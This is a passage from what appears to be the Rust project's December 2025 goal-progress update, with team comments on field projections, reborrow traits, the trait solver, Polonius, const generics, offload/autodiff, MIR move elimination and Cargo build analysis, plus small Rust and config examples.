        self.0.offset()
    }
}

When there is ambiguity, because the wrapper and the wrapped types both have the same field, the wrapper's field takes precedence (this is the same as it currently works for Deref). It is still possible to refer to the wrapped field by first dereferencing the container, so x.field refers to the wrapper's field and (*x).field refers to the field of the wrapped type.

Comment by @BennoLossin posted on 2025-12-20:

Field-by-Field Projections vs One-Shot Projections

We have used several different names for these two ways of implementing projections. The first is also called 1-level projections and the second multi-level projections.

The field-by-field approach uses field representing types (FRTs), which represent a single field of a struct with no indirection. When writing something like @x.y.z, we perform the place operation twice, first using the FRT field_of!(X, y) and then again with field_of!(T, z) where T is the resulting type of the first projection.

The second approach called one-shot projections instead extends FRTs with projections, these are compositions of FRTs, can be empty and dynamic. Using these we desugar @x.y.z to a single place operation.

Field-by-field projections have the advantage that they simplify the implementation for users of the feature, the compiler implementation, and the mental model that people will have to keep in mind when interacting with field projections. However, they also have pretty big downsides, which either are fundamental to their design or would require significant complication of the feature:

  • They have less expressiveness than one-shot projections. For example, when moving out a subsubfield of x: &own Struct by doing let a = @x.field.a, we have to move out field, which prevents us from later writing let b = @x.field.b. One-shot projections allow us to track individual subsubfields with the borrow checker.
  • Field-by-field projections also make it difficult to define type-changing projections in an inference friendly way. Projecting through multiple fields could result in several changes of types in between, so we would have to require only canonical projections in certain places. However, this requires certain intermediate types for which defining their safety invariants is very complex.

We additionally note that the single-function-call desugaring is a simplification that also lends itself much better to explaining what the @ syntax does.

All of this points in the direction of proceeding with one-shot projections and we will most likely do that. However, we must note that the field-by-field approach might yield easier trait definitions that make implementing the various place operations more manageable. There are several open issues on how to design the field-by-field API in the place variation (the previous proposal did have this mapped out clearly, but it does not translate very well to places), which would require significant effort to solve. So at this point we cannot really give a fair comparison. Our initial scouting of the solutions revealed that they all have some sort of limitation (as we explained above for intermediate projection types for example), which make field-by-field projections less desirable. So for the moment, we are set on one-shot projections, but when the time comes to write the RFC we need to revisit the idea of field-by-field projections.

Comment by @BennoLossin posted on 2025-12-25:

Wiki Project

We started a wiki project at https://rust-lang.github.io/beyond-refs to map out the solution space. We intend to grow it into the single source of truth for the current state of the field projection proposal as well as unfinished and obsolete ideas and connections between them. Additionally, we will aim to add the same kind of information for the in-place initialization effort, since it has overlap with field projections and, more importantly, has a similarly large solution space.

In the beginning you might find many stub pages in the wiki, which we will work on making more complete. We will also mark pages that contain old or abandoned ideas as such as well as mark the current proposal.

This issue will continue to receive regular detailed updates, which are designed for those keeping reasonably up-to-date with the feature. For anyone out of the loop, the wiki project will be a much better place when it contains more content.

Reborrow traits (rust-lang/rust-project-goals#399)
Progress
Point of contact

Aapo Alasuutari

Champions

compiler (Oliver Scherer), lang (Tyler Mandry)

Task owners

Aapo Alasuutari

1 detailed update available.

Comment by @aapoalas posted on 2025-12-17:

Purpose

A refresher on what we want to achieve here: the most basic form of reborrowing we want to enable is this:

// Note: not Clone or Copy
#[derive(Reborrow)]
struct MyMutMarker<'a>(...);

// ...

let marker: MyMutMarker = MyMutMarker::new();
some_call(marker);
some_call(marker);

i.e. make it possible for an owned value to be passed into a call twice, having Rust inject a reborrow at each call site that produces a new bitwise copy of the original value for passing purposes and marks the original value as disabled for reads and writes for the duration of the borrow.

A notable complication appears with implementing such reborrowing in userland using explicit calls when dealing with returned values:

return some_call(marker.reborrow());

If the borrowed lifetime escapes through the return value, then this will not compile as the borrowed lifetime is based on a value local to this function. Alongside convenience, this is the major reason for the Reborrow traits work.

CoerceShared is a secondary trait that enables equivalent reborrowing that only disables the original value for writes, ie. matching the &mut T to &T coercion.

Update

We have the Reborrow trait working, albeit currently with a bug in which the marker must be bound as let mut. We are working towards a working CoerceShared trait in the following form:

trait CoerceShared<Target: Copy> {}

Originally the trait had a type Target ADT but this turned out to be unnecessary, as there is no reason to particularly disallow multiple coercion targets. The original reason for using an ADT to disallow multiple coercion targets was based on the trait also having an unsafe method, at which point unscrupulous users could use the trait as a generic coercion trait. Because the trait method was found to be unnecessary, the fear is also unnecessary.

This means that the trait has better chances of working with multiple coercing lifetimes (think a collection of &muts all coercing to &s, or only some of them). However, we are currently avoiding any support of multiple lifetimes as we want to avoid dealing with rmeta before we have the basic functionality working.

"Flexible, fast(er) compilation"

build-std (rust-lang/rust-project-goals#274)
Progress
Point of contact

David Wood

Champions

cargo (Eric Huss), compiler (David Wood), libs (Amanieu d'Antras)

Task owners

Adam Gemmell, David Wood

1 detailed update available.

Comment by @davidtwco posted on 2025-12-15:

rust-lang/rfcs#3873 is waiting on one checkbox before entering the final comment period. We had our sync meeting on the 11th and decided that we would enter FCP on rust-lang/rfcs#3874 and rust-lang/rfcs#3875 after rust-lang/rfcs#3873 is accepted. We've responded to almost all of the feedback on the next two RFCs and expect the FCP to act as a forcing-function so that the relevant teams take a look, they can always register concerns if there are things we need to address, and if we need to make any major changes then we'll restart the FCP.

Production-ready cranelift backend (rust-lang/rust-project-goals#397)
Progress Will not complete
Point of contact

Folkert de Vries

Champions

compiler (bjorn3)

Task owners

bjorn3, Folkert de Vries, [Trifecta Tech Foundation]

1 detailed update available.

Comment by @folkertdev posted on 2025-12-01:

We did not receive the funding we needed to work on this goal, so no progress has been made.

Overall I think the improvements we felt comfortable promising are on the low side. The amount of time spent in codegen for realistic changes to real code bases was smaller than expected, meaning that the improvements that cranelift can deliver for the end-user experience are smaller.

We still believe larger gains can be made with more effort, but did not feel confident in promising hard numbers.

So for now, let's close this.

Promoting Parallel Front End (rust-lang/rust-project-goals#121)
Progress
Point of contact

Sparrow Li

Task owners

Sparrow Li

No detailed updates available.
Relink don't Rebuild (rust-lang/rust-project-goals#400)
Progress Will not complete
Point of contact

Jane Lusby

Champions

cargo (Weihang Lo), compiler (Oliver Scherer)

Task owners

@dropbear32, @osiewicz

No detailed updates available.

"Higher-level Rust"

Ergonomic ref-counting: RFC decision and preview (rust-lang/rust-project-goals#107)
Progress
Point of contact

Niko Matsakis

Champions

compiler (Santiago Pastorino), lang (Niko Matsakis)

Task owners

Niko Matsakis, Santiago Pastorino

No detailed updates available.
Stabilize cargo-script (rust-lang/rust-project-goals#119)
Progress
Point of contact

Ed Page

Champions

cargo (Ed Page), lang (Josh Triplett), lang-docs (Josh Triplett)

Task owners

Ed Page

1 detailed update available.

Comment by @epage posted on 2025-12-15:

Key developments

  • A fence length limit was added in response to T-lang feedback (https://github.com/rust-lang/rust/pull/149358)
  • Whether to disallow or lint for CR inside of a frontmatter is under discussion (https://github.com/rust-lang/rust/pull/149823)

Blockers

  • https://github.com/rust-lang/rust/pull/146377
  • rustdoc deciding on and implementing how they want frontmatter handled in doctests

"Unblocking dormant traits"

Evolving trait hierarchies (rust-lang/rust-project-goals#393)
Progress
Point of contact

Taylor Cramer

Champions

lang (Taylor Cramer), types (Oliver Scherer)

Task owners

Taylor Cramer, Taylor Cramer & others

1 detailed update available.

Comment by @cramertj posted on 2025-12-17:

Current status:

  • The RFC for auto impl supertraits has been updated to address SemVer compatibility issues.
  • There is a parsing PR kicking off an experimental implementation. The tracking issue for this experimental implementation is here.
In-place initialization (rust-lang/rust-project-goals#395)
Progress
Point of contact

Alice Ryhl

Champions

lang (Taylor Cramer)

Task owners

Benno Lossin, Alice Ryhl, Michael Goulet, Taylor Cramer, Josh Triplett, Gary Guo, Yoshua Wuyts

No detailed updates available.
Next-generation trait solver (rust-lang/rust-project-goals#113)
Progress
Point of contact

lcnr

Champions

types (lcnr)

Task owners

Boxy, Michael Goulet, lcnr

1 detailed update available.

Comment by @lcnr posted on 2025-12-15:

We've continued to fix a bunch of smaller issues over the last month. Tim (Theemathas Chirananthavat) helped uncover a new potential issue due to non-fatal overflow which we'll have to consider before stabilizing the new solver: https://github.com/rust-lang/trait-system-refactor-initiative/issues/258.

I fixed two issues myself in https://github.com/rust-lang/rust/pull/148823 and https://github.com/rust-lang/rust/pull/148865.

tiif with help by Boxy fixed query cycles when evaluating constants in where-clauses: https://github.com/rust-lang/rust/pull/148698.

@adwinwhite fixed a subtle issue involving coroutine witnesses in https://github.com/rust-lang/rust/pull/149167 after having diagnosed the underlying issue there last month. They've also fixed a smaller diagnostics issue in https://github.com/rust-lang/rust/pull/149299. Finally, they've also fixed an edge case of impl well-formedness checking in https://github.com/rust-lang/rust/pull/149345.

Shoyu Vanilla fixed a broken interaction of aliases and fudging in https://github.com/rust-lang/rust/pull/149320. Looking into fudging and HIR typeck Expectation handling also uncovered a bunch of broken edge cases, and I've opened https://github.com/rust-lang/rust/issues/149379 to track these separately.

I have recently spent some time thinking about the remaining necessary work and posted a write-up on my personal blog: https://lcnr.de/blog/2025/12/01/next-solver-update.html. I am currently trying to get a clearer perspective on our cycle handling while slowly working towards an RFC for the changes there. This is challenging as we don't have a good theoretical foundation here yet.

Stabilizable Polonius support on nightly (rust-lang/rust-project-goals#118)
Progress
Point of contact

Rémy Rakic

Champions

types (Jack Huey)

Task owners

Amanda Stjerna, Rémy Rakic, Niko Matsakis

2 detailed updates available.

Comment by @lqd posted on 2025-12-30:

This month's key developments were:

  • borrowck support in a-mir-formality has been progressing steadily - it has its own dedicated updates in https://github.com/rust-lang/rust-project-goals/issues/122 for more details
  • we were also able to find a suitable project for the master's student on a-mir-formality (they accepted and should start around February), which will also help expand our testing coverage for the polonius alpha.
  • tiif has kept making progress on fixing opaque type soundness issue https://github.com/rust-lang/trait-system-refactor-initiative/issues/159. It is the one remaining blocker for passing all tests. By itself it will not immediately fix the two remaining (soundness) issues with opaque type region liveness, but we'll be able to use the same supporting code to ensure the regions are indeed live where they need to be.
  • I quickly cleaned up some inefficiencies in constraint conversion; it hasn't landed yet, but it may not need to because of the next item.
  • but most of the time this month was spent on this final item: we have the first interesting results from the rewriting effort. After a handful of wrong starts, I have a branch almost ready that switches the constraint graph to be lazy and computed during traversal. It removes the need to index the numerous constraints, or to convert liveness data to a different shape. It thus greatly reduces the current alpha overhead (some rare cases even look faster than NLLs, though I don't yet know why; maybe due to being able to better use the sparseness and low connectivity of the constraint graph, and a small number of loans). The overhead wasn't entirely removed of course: the worst offending benchmark has a +5% wall-time regression, and icounts look worse (+13%). This was also only benchmarking the algorithm itself, without the improvements to the rest of borrowck mentioned in previous updates. I should be able to open a PR in the next couple days, once I figure out how to best convert the polonius mermaid graph dump to the new lazy localized constraint generation.
  • and finally, happy holidays everyone!
Comment by @lqd posted on 2025-12-31:
  • I should be able to open a PR in the next couple days

done in https://github.com/rust-lang/rust/pull/150551

Goals looking for help


Other goal updates

Add a team charter for rustdoc team (rust-lang/rust-project-goals#387)
Progress Completed
Point of contact

Guillaume Gomez

Champions

rustdoc (Guillaume Gomez)

No detailed updates available.
Borrow checking in a-mir-formality (rust-lang/rust-project-goals#122)
Progress
Point of contact

Niko Matsakis

Champions

types (Niko Matsakis)

Task owners

Niko Matsakis, tiif

4 detailed updates available.

Comment by @nikomatsakis posted on 2025-12-03:

PR https://github.com/rust-lang/a-mir-formality/pull/206 contains a "first draft" for the NLL rules. It checks for loan violations (e.g., mutating borrowed data) as well as some notion of outlives requirements. It does not check for move errors and there aren't a lot of tests yet.

Comment by @nikomatsakis posted on 2025-12-03:

The PR also includes two big improvements to the a-mir-formality framework:

  • support for (for_all) rules that can handle "iteration"
  • tracking proof trees, making it much easier to tell why something is accepted that should not be
Comment by @nikomatsakis posted on 2025-12-10:

Update: opened https://github.com/rust-lang/a-mir-formality/pull/207 which contains support for &mut, wrote some new tests (including one FIXME), and added a test for NLL Problem Case #3 (which behaved as expected).

One interesting thing (cc Ralf Jung) is that we have diverged from MiniRust in a few minor ways:

  • We do not support embedding value expressions in place expressions.
  • Where MiniRust has a AddrOf operator that uses the PtrType to decide what kind of operation it is, we have added a Ref MIR operation. This is in part because we need information that is not present in MiniRust, specifically a lifetime.
  • We have also opted to extend goto with the ability to take multiple successors, so that goto b1, b2 can be seen as "goto either b1 or b2 non-deterministically" (the actual opsem would probably be to always go to b1, making this a way to add "fake edges", but the analysis should not assume that).
Comment by @nikomatsakis posted on 2025-12-17:

Update: opened https://github.com/rust-lang/a-mir-formality/pull/210 with today's work. We are discussing how to move the checker to support polonius-alpha. To that end, we introduced feature gates (so that a-mir-formality can model nightly features) and did some refactoring of the type checker aiming at allowing outlives to become flow-sensitive.

C++/Rust Interop Problem Space Mapping (rust-lang/rust-project-goals#388)
Progress
Point of contact

Jon Bauman

Champions

compiler (Oliver Scherer), lang (Tyler Mandry), libs (David Tolnay)

Task owners

Jon Bauman

No detailed updates available.
Comprehensive niche checks for Rust (rust-lang/rust-project-goals#262)
Progress
Point of contact

Bastian Kersting

Champions

compiler (Ben Kimock), opsem (Ben Kimock)

Task owners

Bastian Kersting, Jakob Koschel

No detailed updates available.
Const Generics (rust-lang/rust-project-goals#100)
Progress
Point of contact

Boxy

Champions

lang (Niko Matsakis)

Task owners

Boxy, Noah Lev

3 detailed updates available.

Comment by @BoxyUwU posted on 2025-12-30:

Since the last update both of my PRs I mentioned have landed, allowing for constructing ADTs in const arguments while making use of generic parameters. This makes MGCA effectively a "full" prototype where it can now fully demonstrate the core concept of the feature. There's still a lot of work left to do but now we're at the point of finishing out the feature :)

Once again huge thanks to camelid for sticking with me throughout this. Also thanks to errs, oli and lcnr for reviewing some of the work and chatting with me about possible impl decisions.

Some examples of what is possible with MGCA as of the end of this goal cycle:

#![feature(const_default, const_trait_impl, min_generic_const_args)]

trait Trait {
    #[type_const]
    const ASSOC: usize;
}

fn mk_array<T: const Default + Trait>() -> [T; T::ASSOC] {
    [const { T::default() }; _]
}

#![feature(adt_const_params, min_generic_const_args)]

fn foo<const N: Option<u32>>() {}

trait Trait {
    #[type_const]
    const ASSOC: usize;
}

fn bar<T: Trait, const N: u32>() {
    // the initializer of `_0` is a `N` which is a legal const argument
    // so this is ok.
    foo::<{ Some::<u32> { 0: N } }>();

    // this is allowed as mgca supports uses of assoc consts in the
    // type system. ie `<T as Trait>::ASSOC` is a legal const argument
    foo::<{ Some::<u32> { 0: <T as Trait>::ASSOC } }>();

    // this on the other hand is not allowed as `N + 1` is not a legal
    // const argument
    foo::<{ Some::<u32> { 0: N + 1 } }>(); // ERROR
}

As for adt_const_params, we now have a zulip stream specifically for discussion and drafting of the upcoming RFC: #project-const-generics/adt_const_params-rfc. I've gotten part of the way through actually writing the RFC itself, though it's gone slower than I had originally hoped, as I've also been spending more time thinking through the implications of allowing private data in const generics.

I've debugged the remaining two ICEs keeping adt_const_params from being fully ready for stabilization and written some brief instructions on how to resolve them. One ICE has been incidentally fixed (though more masked) by some work that Kivooeo has been doing on MGCA. The other has been picked up by someone whose GitHub handle I'm not sure of, so that will also be getting fixed soon.

Comment by @BoxyUwU posted on 2025-12-30:

Ah I forgot to mention, even though MGCA has a tonne of work left to do I expect it should be somewhat approachable for people to help out with. So if people are interested in getting involved now is a good time :)

Comment by @BoxyUwU posted on 2025-12-30:

Ah, another thing I forgot to mention: David Wood spent some time looking into the name mangling scheme for adt_const_params stuff to make sure it would be fine to stabilize, and it seems it is. So that's another step closer to adt_const_params being stabilizable.

Continue resolving `cargo-semver-checks` blockers for merging into cargo (rust-lang/rust-project-goals#104)
Progress
Point of contact

Predrag Gruevski

Champions

cargo (Ed Page), rustdoc (Alona Enraght-Moony)

Task owners

Predrag Gruevski

No detailed updates available.
Develop the capabilities to keep the FLS up to date (rust-lang/rust-project-goals#391)
Progress
Point of contact

Pete LeVasseur

Champions

bootstrap (Jakub Beránek), lang (Niko Matsakis), spec (Pete LeVasseur)

Task owners

Pete LeVasseur, Contributors from Ferrous Systems and others TBD, t-spec and contributors from Ferrous Systems

1 detailed update available.

Comment by @PLeVasseur posted on 2025-12-16:

Meeting notes here: FLS team meeting 2025-12-12

Key developments: We're close to completing the FLS release for 1.91.0 and 1.91.1. We've started to operate as a team, merging a PR with the changelog entries, then opening up issues for each change required: ✅ #624 (https://github.com/rust-lang/fls/issues/624), ✅ #625 (https://github.com/rust-lang/fls/issues/625), ✅ #626 (https://github.com/rust-lang/fls/issues/626), ⚠️ #623 (https://github.com/rust-lang/fls/issues/623). #623 is still pending, as it requires a bit of alignment with the Reference on definitions and the creation of a new example.

Blockers: None currently.

Help wanted: We'd love more folks from the safety-critical community to contribute by picking up issues or opening an issue if you notice something is missing.

Emit Retags in Codegen (rust-lang/rust-project-goals#392)
Progress
Point of contact

Ian McCormack

Champions

compiler (Ralf Jung), opsem (Ralf Jung)

Task owners

Ian McCormack

1 detailed update available.

Comment by @icmccorm posted on 2025-12-16:

Here's our December status update!

  • We have revised our prototype of the pre-RFC based on Ralf Jung's feedback. Now, instead of having two different retag functions for operands and places, we emit a single __rust_retag intrinsic in every situation. We also track interior mutability precisely. At this point, the implementation is mostly stable and seems to be ready for an MCP.

  • There's been some discussion here and in the pre-RFC about whether or not Rust will still have explicit MIR retag statements. We plan on revising our implementation so that we no longer rely on MIR retags to determine where to insert our lower-level retag calls. This should be a relatively straightforward change to the current prototype. If anything, it should make these changes easier to merge upstream, since they will no longer affect Miri.

  • BorrowSanitizer continues to gain new features, and we've started testing it on our first real crate (lru), which has uncovered a few new bugs in our implementation. The two core Tree Borrows features that we have left to support are error reporting and garbage collection. Once these are finished, we will be able to expand our testing to more real-world libraries and confirm that we are passing each of Miri's test cases (and likely find more bugs lurking in our implementation). Our instrumentation pass ignores global and thread-local state for now, and it does not support atomic memory accesses outside of atomic load and store instructions. These operations should be relatively straightforward to add once we've finished higher-priority items.

  • Performance is slow. We do not know exactly how slow yet, since we've been focusing on feature support over benchmarking and optimization. This is at least partially due to the lack of garbage collection, based on what we're seeing from profiling. We will have a better sense of what our performance is like once we can compare against Miri on more real-world test cases.

As for what's next, we plan on posting an MCP soon, now that it's clear that we will be able to do without MIR retags. You can expect a more detailed status update on BorrowSanitizer by the end of January. This will discuss our implementation and plans for 2026. We will post that here and on our project website.

Expand the Rust Reference to specify more aspects of the Rust language (rust-lang/rust-project-goals#394)
Progress
Point of contact

Josh Triplett

Champions

lang-docs (Josh Triplett), spec (Josh Triplett)

Task owners

Amanieu d'Antras, Guillaume Gomez, Jack Huey, Josh Triplett, lcnr, Mara Bos, Vadim Petrochenkov, Jane Lusby

1 detailed update available.

Comment by @joshtriplett posted on 2025-12-17:

In addition to further ongoing work on reference material (some of which is on track to be merged), we've had some extensive discussions about reference processes, maintenance, and stability markers. Niko Matsakis is putting together a summary and proposal for next steps.

Finish the libtest json output experiment (rust-lang/rust-project-goals#255)
Progress
Point of contact

Ed Page

Champions

cargo (Ed Page)

Task owners

Ed Page

No detailed updates available.
Finish the std::offload module (rust-lang/rust-project-goals#109)
Progress
Point of contact

Manuel Drehwald

Champions

compiler (Manuel Drehwald), lang (TC)

Task owners

Manuel Drehwald, LLVM offload/GPU contributors

2 detailed updates available.

Comment by @ZuseZ4 posted on 2025-12-02:

It's only been two weeks, but we got a good number of updates, so I already wanted to share them.

autodiff

  1. On the autodiff side, we landed the support for rlib and better docs. This means that our autodiff frontend is "almost" complete, since there are almost no cases left where you can't apply autodiff. There are a few features like custom derivatives or support for dyn arguments that I'd like to add, but they are currently waiting for better docs on the Enzyme side. There is also a long-term goal of replacing the fat-lto requirement with the less invasive embed-bc requirement, but this proved to be tricky in the past and only affects compile times.
  2. @sgasho picked up my old PR to dlopen enzyme, and found the culprit of it failing after my last rebase. A proper fix might take a bit longer, but it might be worth waiting for. As a reminder, using dlopen in the future allows us to ship autodiff on nightly without increasing the size of rustc and therefore without making our infra team sad.

All in all, we have landed most of the hard work here, so that's a very comfortable position to be in before enabling it on nightly.

offload

  1. We have landed the intrinsic implementation of Marcelo Domínguez, so now you can offload functions with almost arbitrary arguments. In my first prototype, I had limited it to pointers to 256 f64 values. The updated usage example continues to live here in our docs. As you can see, we still require #[cfg(target_os=X)] annotations. Under the hood, the LLVM-IR which we generate is also still a bit convoluted. In his next PRs, he'll clean up the generated IR, and introduce an offload macro that users shall call instead of the internal offload intrinsic.
  2. I spent more time on enabling offload in our CI, to enable std::offload in nightly. After multiple iterations and support from LLVM offload devs, we found a cmake config that does not run into bugs, should not increase Rust CI time too much, and works both with in-tree llvm/clang builds and with external clangs (the current case in our Rust CI).
  3. I spent more time on simplifying the usage instructions in the dev guide. We started with two cargo calls, one rustc call, two clang calls, and two clang-helper binary calls. I was able to remove the rustc call and one of the clang-offload-packager calls by directly calling the underlying LLVM APIs. I also have an unmerged PR which removes the two clang calls. Once I've cleaned it up and landed it, we will be down to only two cargo calls and one binary call to clang-linker-wrapper. Once I've automated this last wrapper (and enabled offload in CI), nightly users should be able to experiment with std::offload.
Comment by @ZuseZ4 posted on 2025-12-26:

Time for the next round of updates. Again, most of the updates were on the GPU side, but with some notable autodiff improvements too.

autodiff:

  1. @sgasho finished his work on using dlopen to load enzyme, and the PR landed. This allowed Jakub Beránek and me to start working on distributing Enzyme via a standalone component.

  2. As a first step, I added a nicer error if we fail to find or dlopen our Enzyme backend. I also removed most of our autodiff fallbacks; we now unconditionally enable our macro frontend on nightly: https://github.com/rust-lang/rust/pull/150133 You may notice that cargo expand now works on autodiff code. This also allowed the first bug reports about ICEs (internal compiler errors) in our macro parser logic.

  3. Kobzol opened a PR to build Enzyme in CI. In theory, I should have been able to download that artifact, put it into my sysroot, and use the latest nightly to automatically load it. If that had worked, we could have just merged his PR, and everyone could have started using AD on nightly. Of course, things are never that easy. Even though Enzyme, LLVM, and rustc were all built in CI, the LLVM version shipped along with rustc does not seem compatible with the LLVM version Enzyme was built against. We assume some slight cmake mismatch during our CI builds, which we will have to debug.

offload:

  1. On the gpu side, Marcelo Domínguez finished his cleanup PR, and along the way also fixed using multiple kernels within a single codebase. When developing the offload MVP I had taken a lot of inspiration from the LLVM-IR generated by clang - and it looks like I had gotten one of the (way too many) LLVM attributes wrong. That caused some metadata to be fused when multiple kernels are present, confusing our offload backend. We started to find more bugs when working on benchmarks; more about the fixes for those in the next update.

  2. I finished cleaning up my offload build PR, and Oliver Scherer reviewed and approved it. Once the dev-guide gets synced, you should see much simpler usage instructions. Now it's just up to me to automate the last part; then you can compile offload code purely with cargo or rustc. I also improved how we build offload, which allows us to build it both in CI and locally. CI had some very specific requirements to not increase build times, since our x86-64-dist runner is already quite slow.

  3. Our first benchmarks directly linked against NVIDIA and AMD intrinsics on the llvm-ir level. However, we have had an nvptx Rust module for a while, and more recently also an amdgpu module, which nicely wraps those intrinsics. I just synced the stdarch repository into rustc a few minutes ago, so from now on, we can replace both with the corresponding Rust functions. In the near future we should get a higher-level GPU module, which abstracts away naming differences between vendors.

  4. Most of my past rustc contributions were related to LLVM projects or plugins (Offload and Enzyme), and I increasingly found myself asking other people for updates or backports of our LLVM submodule, since upstream LLVM has fixes that were not yet merged into it. Our LLVM working group is quite small and I didn't want to burden them too much with my requests, so I recently asked to join it, which got approved. In the future I intend to help a little with the maintenance here.

Getting Rust for Linux into stable Rust: compiler features (rust-lang/rust-project-goals#407)
Progress
Point of contact

Tomas Sedovic

Champions

compiler (Wesley Wiser)

Task owners

(depending on the flag)

1 detailed update available.

Comment by @tomassedovic posted on 2025-12-05:

Update from the 2025-12-03 meeting:

-Zharden-sls

Wesley reviewed it again, provided a qualification, and requested more changes.

Getting Rust for Linux into stable Rust: language features (rust-lang/rust-project-goals#116)
Progress
Point of contact

Tomas Sedovic

Champions

lang (Josh Triplett), lang-docs (TC)

Task owners

Ding Xiang Fei

2 detailed updates available.

Comment by @tomassedovic posted on 2025-12-05:

Update from the 2025-12-03 meeting.

Deref / Receiver

Ding keeps working on the Reference draft. The idea hasn't spread widely yet, and people are not convinced this is a good way to go. We hope the method-probing section in the Reference PR will clear things up.

We're keeping the supertrait auto-impl experiment as an alternative.

RFC #3851: Supertrait Auto-impl

Ding addressed Predrag's requests on SemVer compatibility. He's also opened an implementation PR: https://github.com/rust-lang/rust/pull/149335. Here's the tracking issue: https://github.com/rust-lang/rust/issues/149556.

derive(CoercePointee)

Ding opened a PR to require additional checks for DispatchFromDyn: https://github.com/rust-lang/rust/pull/149068

In-place initialization

Ding will prepare material for a discussion at the LPC (Linux Plumbers Conference). We're looking to hear feedback on the end-user syntax for it.

The feature is growing quite large; Ding will check with Tyler on whether this might need a series of RFCs.

The various proposals on the table continue to be discussed and there are signs of (albeit slow) convergence. The placing-function and guaranteed-return proposals are superseded by the outpointer one. The more ergonomic ideas can be built on top. The guaranteed-value-placement one would be valuable in the compiler regardless, and we're waiting for Olivier to refine it.

The feeling is that we've now clarified the constraints that the proposals must operate under.

Field projections

Nadri's Custom places proposal is looking good, at least for the user-facing bits, but the whole thing is growing into a large undertaking. Benno's been focused on academic work that's getting wrapped up soon. The two will sync afterwards.

Comment by @tomassedovic posted on 2025-12-18:

Quick bit of great news: Rust in the Linux kernel is no longer treated as an experiment, it's here to stay 🎉

https://lwn.net/SubscriberLink/1050174/63aa7da43214c3ce/

Implement Open API Namespace Support (rust-lang/rust-project-goals#256)
Progress
Point of contact

Help Wanted

Champions

cargo (Ed Page), compiler (b-naber), crates-io (Carol Nichols)

Task owners

b-naber, Ed Page

3 detailed updates available.

Comment by @sladyn98 posted on 2025-12-03:

Ed Page, hey, I would like to contribute to this. I reached out on Zulip. Bumping up the post in case it might have gone under the radar.

CC Niko Matsakis

Comment by @epage posted on 2025-12-03:

The work is more on the compiler side atm, so Eric Holk and b-naber could speak more to where they could use help.

Comment by @eholk posted on 2025-12-06:

Hi @sladyn98 - feel free to ping me on Zulip about this.

MIR move elimination (rust-lang/rust-project-goals#396)
Progress
Point of contact

Amanieu d'Antras

Champions

lang (Amanieu d'Antras)

Task owners

Amanieu d'Antras

1 detailed update available.

Comment by @Amanieu posted on 2025-12-17:

The RFC draft was reviewed in detail and Ralf Jung pointed out that the proposed semantics introduce issues because they rely on "no-behavior" (NB) with regard to choosing an address for a local. This can lead to surprising "time-traveling" behavior where the set of possible addresses that a local may have (and whether 2 locals can have the same address) depends on information from the future. For example:

// This program has defined behavior (DB)
let x = String::new();
let xaddr = &raw const x;
let y = x; // Move out of x and de-initialize it.
let yaddr = &raw const y;
x = String::new(); // assuming this does not change the address of x
// x and y are both live here. Therefore, they can't have the same address.
assume(xaddr != yaddr);
drop(x);
drop(y);

// This program has UB
let x = String::new();
let xaddr = &raw const x;
let y = x; // Move out of x and de-initialize it.
let yaddr = &raw const y;
// So far, there has been no constraint that would force the addresses to be different.
// Therefore we can demonically choose them to be the same. Therefore, this is UB.
assume(xaddr != yaddr);
// If the addresses are the same, this next line triggers NB. But actually this next
// line is unreachable in that case because we already got UB above...
x = String::new();
// x and y are both live here.
drop(x);
drop(y);

With that said, there is still a possibility of achieving the optimization, but the scope will need to be scaled down a bit. Specifically, we would need to:

  • no longer perform a "partial free"/"partial allocation" when initializing or moving out of a single field of a struct. The lifetime of a local starts when any part of it is initialized and ends when it is fully moved out.
  • allow a local's address to change when it is re-initialized after having been fully moved out, which eliminates the need for NB.

This reduces the optimization opportunities since we can't merge arbitrary sub-field moves, but it still allows for eliminating moves when constructing a struct from multiple values.
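
As a hypothetical illustration of the remaining opportunity (types and sizes invented for the example):

struct Pair {
    a: [u8; 1024],
    b: [u8; 1024],
}

// Under the scaled-down rules, `a` and `b` may be computed directly
// into the memory of the `Pair` being constructed, so building it
// need not physically copy the two 1 KiB payloads.
fn build(a: [u8; 1024], b: [u8; 1024]) -> Pair {
    Pair { a, b } // these moves are candidates for elimination
}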

The next step is for me to rework the RFC draft to reflect this.

Prototype a new set of Cargo "plumbing" commands (rust-lang/rust-project-goals#264)
Progress
Point of contact

Help Wanted

Task owners

Help wanted, Ed Page

No detailed updates available.
Prototype Cargo build analysis (rust-lang/rust-project-goals#398)
Progress
Point of contact

Weihang Lo

Champions

cargo (Weihang Lo)

Task owners

Help wanted Weihang Lo, Weihang Lo

2 detailed updates available.

Comment by @weihanglo posted on 2025-12-13:

Key developments: the HTML replay logic has merged. Once it gets into nightly, cargo report timings can open a timing report you previously logged.

  • https://github.com/rust-lang/cargo/pull/16377
  • https://github.com/rust-lang/cargo/pull/16378
  • https://github.com/rust-lang/cargo/pull/16382

Blockers: No, except my own availability

Help wanted: Same as https://github.com/rust-lang/rust-project-goals/issues/398#issuecomment-3571897575

Comment by @weihanglo posted on 2025-12-26:

Key developments:

Headline: if you are using nightly and want timing data to always be available, you can enable build analysis locally:

[unstable]
build-analysis = true

[build.analysis]
enabled = true
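
(With this config on a recent nightly, each build logs its timing data, and cargo report timings replays the most recent session, as described above.)
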
  • More log events are emitted: https://github.com/rust-lang/cargo/pull/16390
    • dependency resolution time
    • unit-graph construction
    • unit registration (which contains unit metadata)
  • Timing replay via cargo report timings now has almost full feature parity with cargo build --timings, except for CPU usage: https://github.com/rust-lang/cargo/pull/16414
  • Renamed the rebuild event to unit-fingerprint; it is now also emitted for fresh units: https://github.com/rust-lang/cargo/pull/16408
  • Proposed a new cargo report sessions command so that people can retrieve previous session IDs rather than only the latest one: https://github.com/rust-lang/cargo/pull/16428
  • Proposed removing --timings=json, since timing info in log files should be a great replacement: https://github.com/rust-lang/cargo/pull/16420
  • Documentation efforts for man pages for the nested cargo report commands: https://github.com/rust-lang/cargo/pull/16430 and https://github.com/rust-lang/cargo/pull/16432

Besides implementations, we also discussed:

  • The interaction of --message-format with the structured logging system, as well as log event schemas and formats: https://rust-lang.zulipchat.com/#narrow/channel/246057-t-cargo/topic/build.20analysis.20log.20format/with/558294271
  • A better name for RunId. We may lean towards SessionId, which is a common name in the logging/tracing ecosystem.
  • Having nested Cargo calls share a sticky session ID, or at least a way to show they were invoked from the same top-level Cargo call.

Blockers: No, except my own availability

Help wanted: Same as https://github.com/rust-lang/rust-project-goals/issues/398#issuecomment-3571897575

reflection and comptime (rust-lang/rust-project-goals#406)
Progress
Point of contact

Oliver Scherer

Champions

compiler (Oliver Scherer), lang (Scott McMurray), libs (Josh Triplett)

Task owners

oli-obk

1 detailed update available.

